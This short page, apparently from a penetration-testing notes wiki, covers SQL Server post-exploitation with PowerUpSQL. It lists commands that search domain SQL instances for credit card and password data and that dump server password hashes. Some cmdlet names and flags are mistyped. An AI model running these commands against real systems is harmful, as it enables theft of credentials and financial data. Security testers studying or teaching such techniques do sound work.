Post Exploitation

Finding Sensitive Info

Indicators of sensitive info are the size, utilization of transparent encryption, names etc.

For example, we can use this PowerUpSQL query to identify sensitive info based on names:

>> Get-SQLInstanceDomain | Get-SQLConnectionTest | GetSQLColumnSampleDataThreaded -Verbose -Threads 10 -Keyword "credit,money,password" -SampleSize 2 -ValidateCC -NoDefaults

Or with transparent encryption:

Get-SQLInstanceDomain | Get-SQLConnectionTest | Get-SQLDatabaseThreaded – Verbose –Threads 10 -NoDefaults | Where-Object {$_.is_encrypted –eq "TRUE"} |
Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword "card, password" –SampleSize 2 –ValidateCC -NoDefaults

Extracting hashes

PowerUpSQL has a very useful function called GetSQLServerPasswordHash that automates the extracting hashes.

Get-SQLServerPasswordHash -Verbose -Instance MSSQLSERVER2016\DATABASE -Migrate

Todo

Getting code execution via xpcmdshell and sp_OACreate

PreviousPrivilege Escalation NextVulnerability Discovery

Last updated 3 years ago